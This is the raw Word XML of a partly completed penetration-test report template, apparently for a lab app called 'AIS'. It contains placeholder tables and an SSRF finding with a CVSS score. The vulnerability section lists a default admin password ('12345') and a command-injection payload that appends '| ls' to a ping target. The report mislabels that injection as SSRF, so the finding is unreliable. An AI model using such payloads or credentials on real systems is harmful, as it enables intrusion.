    <w:p w14:paraId="611D01A3" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A"/>
    <w:p w14:paraId="30D4A674" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:bookmarkStart w:id="13" w:name="_Toc155811459"/>
      <w:r>
        <w:t>3.1 Technology components</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="69027A9E" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>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51"/>
        <w:gridCol w:w="6013"/>
      </w:tblGrid>
      <w:tr w:rsidR="00ED747A" w14:paraId="38CACBF0" w14:textId="77777777" w:rsidTr="00560E26">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2271" w:type="dxa"/>
            <w:shd w:val="solid" w:color="000000" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1F26EE5F" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00560E26">
            <w:pPr>
              <w:pStyle w:val="BodyTextIndent"/>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6225" w:type="dxa"/>
            <w:shd w:val="solid" w:color="000000" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3393665D"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20F79219" w14:textId="77777777" w:rsidTr="00560E26">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2271" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56FE7AF8" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00560E26">
            <w:pPr>
              <w:pStyle w:val="BodyTextIndent"/>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
              <w:t>Applications</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6225" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BC0728D" w14:textId="28FA907E" w:rsidR="00ED747A" w:rsidRDefault="00EA24AF" w:rsidP="00560E26">
            <w:pPr>
              <w:pStyle w:val="BodyTextIndent"/>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
              <w:t>Golang AIS app</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED747A" w14:paraId="0C4EFEC7" w14:textId="77777777" w:rsidTr="00560E26">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2271" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54AC7AC2" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00560E26">
            <w:pPr>
              <w:pStyle w:val="BodyTextIndent"/>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
              <w:t>Databases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6225" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77EE4EB9" w14:textId="3AB05141" w:rsidR="00ED747A" w:rsidRDefault="00EA24AF" w:rsidP="00560E26">
            <w:pPr>
              <w:pStyle w:val="BodyTextIndent"/>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
              <w:t>AWS AIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED747A" w14:paraId="09666D88" w14:textId="77777777" w:rsidTr="00560E26">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2271" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D90DD9A" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00560E26">
            <w:pPr>
              <w:pStyle w:val="BodyTextIndent"/>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
              <w:t>Operating Systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6225" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49923775" w14:textId="308601C7" w:rsidR="00ED747A" w:rsidRDefault="00EA24AF" w:rsidP="00560E26">
            <w:pPr>
              <w:pStyle w:val="BodyTextIndent"/>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
              <w:t>Burp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED747A" w14:paraId="2B2AA33F" w14:textId="77777777" w:rsidTr="00560E26">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2271" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3984AEB5" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00560E26">
            <w:pPr>
              <w:pStyle w:val="BodyTextIndent"/>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
              <w:t>Networks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6225" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="322F275A" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00560E26">
            <w:pPr>
              <w:pStyle w:val="Default"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="56057A1E" w14:textId="500E5A35" w:rsidR="00ED747A" w:rsidRDefault="00EA24AF" w:rsidP="00560E26">
            <w:pPr>
              <w:pStyle w:val="Default"/>
            </w:pPr>
            <w:r>
              <w:t>AIS 2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED747A" w14:paraId="4F5DE504" w14:textId="77777777" w:rsidTr="00560E26">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2271" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DC57344" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00560E26">
            <w:pPr>
              <w:pStyle w:val="BodyTextIndent"/>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
              <w:t>Interconnections</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6225" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3AE3C734" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00560E26">
            <w:pPr>
              <w:pStyle w:val="BodyTextIndent"/>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED747A" w14:paraId="49CD3542" w14:textId="77777777" w:rsidTr="00560E26">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2271" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60279D19" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00560E26">
            <w:pPr>
              <w:pStyle w:val="BodyTextIndent"/>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
              <w:t>Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6225" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6AC2AF55" w14:textId="7832F5B8" w:rsidR="00ED747A" w:rsidRDefault="00EA24AF" w:rsidP="00560E26">
            <w:pPr>
              <w:pStyle w:val="BodyTextIndent"/>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6080F599" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A">
      <w:pPr>
        <w:pStyle w:val="BodyTextIndent"/>
        <w:spacing w:before="120"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4779452C" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A">
      <w:pPr>
        <w:pStyle w:val="Default"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="125F8B71" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc155811460"/>
      <w:r>
        <w:t xml:space="preserve">3.3 Data Used </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>By</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> System</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="76753B73" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A">
      <w:pPr>
        <w:pStyle w:val="Default"/>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23"/>
        <w:gridCol w:w="6041"/>
      </w:tblGrid>
      <w:tr w:rsidR="00ED747A" w14:paraId="1411C166" w14:textId="77777777" w:rsidTr="00560E26">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2271" w:type="dxa"/>
            <w:shd w:val="solid" w:color="000000" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0A769CF9" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00560E26">
            <w:pPr>
              <w:pStyle w:val="BodyTextIndent"/>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6225" w:type="dxa"/>
            <w:shd w:val="solid" w:color="000000" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0370A90B"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41AFB3DF" w14:textId="77777777" w:rsidTr="00560E26">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2271" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08351497" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00560E26">
            <w:pPr>
              <w:pStyle w:val="BodyTextIndent"/>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
              <w:t>[Detail data elements included in scope]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6225" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7763909C" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00560E26">
            <w:pPr>
              <w:pStyle w:val="Default"/>
            </w:pPr>
            <w:r>
              <w:t>[Describe characteristics of data elements]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0C944DF4" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="307F383F" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc155811461"/>
      <w:r>
        <w:t>3.4 Users</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="1B9DA1FB" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A">
      <w:pPr>
        <w:pStyle w:val="Default"/>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28"/>
        <w:gridCol w:w="6036"/>
      </w:tblGrid>
      <w:tr w:rsidR="00ED747A" w14:paraId="3DB59735" w14:textId="77777777" w:rsidTr="00560E26">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2271" w:type="dxa"/>
            <w:shd w:val="solid" w:color="000000" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="095BCC8A" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00560E26">
            <w:pPr>
              <w:pStyle w:val="BodyTextIndent"/>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="16" w:name="OLE_LINK1"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Users</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6225" w:type="dxa"/>
            <w:shd w:val="solid" w:color="000000" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="21C28002" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00560E26">
            <w:pPr>
              <w:pStyle w:val="BodyTextIndent"/>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED747A" w14:paraId="66418ADD" w14:textId="77777777" w:rsidTr="00560E26">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2271" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A7694DB" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00560E26">
            <w:pPr>
              <w:pStyle w:val="BodyTextIndent"/>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
              <w:t>[Detail categories of users]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6225" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32399623" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00560E26">
            <w:pPr>
              <w:pStyle w:val="BodyTextIndent"/>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
              <w:t>[Describe how users access the system and their intended use of the system]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="16"/>
    </w:tbl>
    <w:p w14:paraId="141B558C" w14:textId="52747B01" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77AD90E8" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc155811462"/>
      <w:r>
        <w:t>4. Vulnerability Statement</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="589D0532" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35B3AC69" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="117A7DA9" w14:textId="623948D1" w:rsidR="00471167" w:rsidRDefault="00471167" w:rsidP="00ED747A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Admin -&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> admin, pass </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>12345</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2A37D230" w14:textId="2E29FFE4" w:rsidR="00471167" w:rsidRDefault="009854FE" w:rsidP="00ED747A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009854FE">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ping -c 1 "1.1.1.1| ls"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> watcher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744BFC9B" w14:textId="77777777" w:rsidR="009854FE" w:rsidRDefault="009854FE" w:rsidP="00ED747A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AABE554" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc155811463"/>
      <w:r>
        <w:t>5. Threat Statement</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F89784A" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D8B89A" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
        </w:rPr>
        <w:t>[Compile and list the potential threat-sources applicable to the system assessed].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3C277B" w14:textId="581BAEBC" w:rsidR="00ED747A" w:rsidRDefault="00000000" w:rsidP="00ED747A">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidR="001E41B3" w:rsidRPr="00F903B9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3B12FD0B" w14:textId="77777777" w:rsidR="001E41B3" w:rsidRDefault="001E41B3" w:rsidP="00ED747A">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2305FDE8" w14:textId="5D320CEF" w:rsidR="001E41B3" w:rsidRDefault="00000000" w:rsidP="00ED747A">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="001E41B3" w:rsidRPr="00F903B9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://nvd.nist.gov/vuln-metrics/cvss</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7F039CBD" w14:textId="77777777" w:rsidR="001E41B3" w:rsidRDefault="001E41B3" w:rsidP="00ED747A">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4191BA2A" w14:textId="46462902" w:rsidR="00ED747A" w:rsidRDefault="001E41B3" w:rsidP="001E41B3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc155811464"/>
      <w:r>
        <w:t>5.1 Server</w:t>
      </w:r>
      <w:r w:rsidRPr="001E41B3">
        <w:t>-side request forgery</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="21511F78" w14:textId="77777777" w:rsidR="001E41B3" w:rsidRDefault="001E41B3" w:rsidP="001E41B3"/>
    <w:p w14:paraId="23A5F61B" w14:textId="42AFA6F9" w:rsidR="001E41B3" w:rsidRDefault="001E41B3" w:rsidP="001E41B3">
      <w:r>
        <w:t xml:space="preserve">Severity: </w:t>
      </w:r>
      <w:r w:rsidR="00C71329">
        <w:t>High</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC9BBD5" w14:textId="177887B3" w:rsidR="00572FAE" w:rsidRDefault="001E41B3" w:rsidP="001E41B3">
      <w:r>
        <w:t xml:space="preserve">CVSS 3.1 score: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00C71329" w:rsidRPr="00C71329">
        <w:t>AV:N</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00C71329" w:rsidRPr="00C71329">
        <w:t>/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7577EDDC" w14:textId="4EDC182C" w:rsidR="001E41B3" w:rsidRDefault="001E41B3" w:rsidP="001E41B3">
      <w:r>
        <w:t xml:space="preserve">Scoring Vector: </w:t>
      </w:r>
      <w:r w:rsidR="00C71329">
        <w:t>8.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F259EB5" w14:textId="77777777" w:rsidR="001E41B3" w:rsidRDefault="001E41B3" w:rsidP="001E41B3"/>
    <w:p w14:paraId="148333BF" w14:textId="77777777" w:rsidR="001E41B3" w:rsidRDefault="001E41B3" w:rsidP="001E41B3"/>
    <w:p w14:paraId="048C992C" w14:textId="77777777" w:rsidR="001E41B3" w:rsidRDefault="001E41B3" w:rsidP="001E41B3">
      <w:r w:rsidRPr="001E41B3">
        <w:t>Description:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B593DD" w14:textId="027179F1" w:rsidR="001E41B3" w:rsidRDefault="00572FAE" w:rsidP="001E41B3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The "Watcher - Enter IP to ping" functionality within the application has been identified to contain a Server-Side Request Forgery (SSRF) vulnerability. This vulnerability allows an attacker to manipulate the server into performing a ping command to arbitrary IP addresses, including internal ones, by exploiting inadequate input validation.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00572FAE">
        <w:t>The vulnerability allows an attacker to scan the internal infrastructure of the app by performing a `</w:t>
      </w:r>
      <w:r w:rsidRPr="00572FAE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00572FAE">
        <w:t xml:space="preserve">ping -c 1 "1.1.1.1| ls"` to an internal IPv4 and IPv6 </w:t>
      </w:r>
      <w:r w:rsidRPr="00572FAE">
        <w:t>address</w:t>
      </w:r>
      <w:r>
        <w:t>es</w:t>
